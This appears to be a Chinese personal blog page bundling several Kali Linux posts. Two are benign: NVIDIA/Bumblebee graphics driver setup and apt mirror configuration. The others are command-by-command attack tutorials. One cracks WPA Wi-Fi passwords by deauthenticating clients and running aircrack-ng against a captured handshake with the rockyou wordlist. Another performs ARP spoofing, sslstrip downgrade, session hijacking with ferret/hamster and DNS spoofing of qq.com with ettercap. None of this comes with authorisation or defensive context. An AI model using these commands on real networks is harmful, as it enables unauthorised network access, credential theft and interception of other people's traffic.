1、禁止加载开源驱动nouveau (非必须)

/etc/modprobe.d/nvidia-installer-disable-nouveau.conf文件中(不存在则新建)加入:

1
2
3
# generated by nvidia-installer
blacklist nouveau
options nouveau modeset=0

2、安装内核头文件

1
apt-get install -y linux-headers-$(uname -r)

3、安装nvidia驱动相关的包

1
apt-get install  nvidia-kernel-dkms nvidia-cuda-toolkit nvidia-driver

要选yes

4、安装双显卡切换解决方案的包

1
apt-get install  bumblebee-nvidia primus

5、添加当前用户到bumblebee用户组

1
2
adduser $USER bumblebee
"$USER" 就是你当前的用户名

6、修改bumblebee配置

  1. 修改 /etc/bumblebee/bumblebee.conf

    1
    Driver=nvidia
  2. 修改 /etc/bumblebee/xorg.conf.nvidiaSection "Device"中添加PCI ID,

    1
    BusID "PCI:01:00:0"

这个值通过 lspci 得到,找到你的独立显卡那一行,将01:00.0修改为01:00:0

1
01:00.0 3D controller: NVIDIA Corporation GK208M [GeForce GT 740M] (rev al)

7、注销当前用户

1
gnome-session-quit --no-prompt

8、启动bumblebee服务并且设置为开机自启动

1
2
service bumblebeed start
update-rc.d bumblebeed enable

9、检查X11配置

正常情况下不需要存在 xorg.conf
如果存在 /etc/X11/xorg.conf,可以先尝试重启,如果无法重启到桌面环境,则删除该文件。

10、是否安装成功的检查

  1. 首先要可以进入桌面环境
  2. lspci 的输出中,对应独立显卡的那条记录已(rev ff)结尾,表示独立显卡以关闭
  3. 运行 glxgears 查看帧数,然后 optirun glxgears 一般使用独立显卡时,帧数有较大提高。
  4. 使用独显的过程中, lsmod |grep nvidia 应该会有输出信息

总结

默认使用集显,在需要独显时,通过optirun来运行。

部分软件的安装可能提示不同,需要您自己判读。

安装过程中遇到的错误

在执行 lspci 时发现

1
2
00:02.0 VGA compatible controller: Intel Corporation 4th Gen Core Processor Integrated Graphics Controller (rev 06)
01:00.0 3D controller: NVIDIA Corporation GK208M [GeForce GT 740M] (rev al)

集成显卡后面是(rev 06)而独立显卡是(rev al)结尾说明两个显卡同时在工作,

执行optirun glxgears发现出现一下错误

1
2
[  158.673191] [ERROR]The Bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect.
[ 158.673219] [ERROR]Could not connect to bumblebee daemon - is it running?

原因是bumblebee服务未启动,执行service bumblebeed start就可以了,一定要设置bumblebee开机自启动,否则下次开机会出现同样的错误。

安装有问题,进行清理

1
apt-get purge nvidia* bumblebee* prime*

如果还通过nvidia官方的驱动进行过安装,可以运行

1
./NVIDIA*.run --uninstall

一般上诉两步就可以恢复系统到没有安装nvidia的状态。

评论和共享

kali linux的更新源:

1
vi /etc/apt/sources.list
1
2
3
4
5
6
#kali官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
#阿里云源
deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free

对Kali进行清洁、更新、升级和发行版升级等处理

1
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

汉化火狐浏览器

1
apt-get install iceweasel-l10n-zh-cn

安装中文输入法(搜狗)

1
2
3
apt-get install fcitx
dpkg -i sougoupinyinXXX.deb
apt-get -f install

http://os.51cto.com/art/201405/439494.htm
http://blog.csdn.net/q_l_s/article/details/53185601

评论和共享

1.找一个字典文件


这里用 Kali Linux 自带的rockyou字典,
使用前先解压。
1
gzip -d /usr/share/wordlist/rockyou.txt.gz


2.断开链接的WiFi


1
airmon-ng


列出所有支持监控模式的网卡。

3.监听网卡

1
airmon-ng start wlan0

此时网卡就处于监听模式,被监听的网卡变为 wlan0mon。

可使用ifconfig命令查看。

4.查看WiFi网络


1
airodump-ng wlan0mon

可以看到周围WiFi的详细信息,包括信号强度、加密类型、频道(CH)等。

要记住破解WIFI的频道号和BSSID。

5.抓取握手包


1
airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon

6 频道号(CH)

C8:3A.... 目标BSSID号

-w 抓取数据包保存位置

6.强制让设备重连WiFi


原理:给链接到WiFi的一个设备发送一个deauth(反认证)包,让那个设备断开WiFi,
随后它自然会再次链接。
1
aireplay-ng -0 2 -a C8:3A:35:60:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

-0 发送反认证包的个数

-a 指定路由器BSSID

-c 指定强制断开的设备

成功监听到握手包后:Ctrl+C 结束抓包。

1
airmon-ng stop wlan0mon

结束监听。

7.开始破解握手包密码


1
aircrack-ng -a2 -b C8:3A:35:60:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap

-a2代表握手包

-b 指定要破解的WiFi BSSID

-w 指定字典文件

最后是抓取的包

评论和共享

嗅探,arp欺骗,会话劫持


工具:Kali Linux ettercap
第一次需要配置
1
2
3
4
5
/etc/ettercap/etter.conf
ec_uid = 0
ec_gid = 0
[linux]
if you use iptables 这行,将下面#去掉,打开转发。

1
2
3
4

/etc/NetworkManager/NetworkManager.conf
[ifupdown]
managed=true

改完后重启NetworkManager

1
service network-manager restart
1
2
cat /proc/sys/net/ipv4/ip_forward
echo 1>>/proc/sys/net/ipv4/ip_forward

ettercap

1
ettercap -T -M arp /// /// -q -i eth0

第一个 /// 是嗅探目标 –IP地址

第二个 /// 是嗅探网络 –网关地址
eth0 是网卡编号

driftnet 显示访问图片

1
driftnet -i eth0

arpspoof (同样需要开启路由转发)

1
arpspoof -i eth0 -t 被攻击者ip 攻击者ip

数据包捕获


tcpdump wireshark(图形界面)

1
tcpdump -i eth0 -w text.txt

drafnet

SSL数据嗅探


1
2
3
4
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -l 10000 -w log.txt
之后开启ARP欺骗工具
用完记得取消 -A -> -D

session劫持-arp欺骗


1
2
3
4
5
6
arpspoof -i eth0 -t 192.168.14.2 192.168.14.132
tcpdump -i eth0 -w text.cap
ferret -r text.cpp
hamster
设置代理
http://hamster

session劫持-DNS欺骗


1
2
3
4
5
使用ettercap进行arp欺骗
vi /etc/ettercap/etter.dns
*.qq.com A 183.175.12.144
//修改dns到自己的服务器
dns_spoof

评论和共享

  • 第 1 页 共 1 页
作者的图片

Archie Shi

Nothing to say


Front-End Development Engineer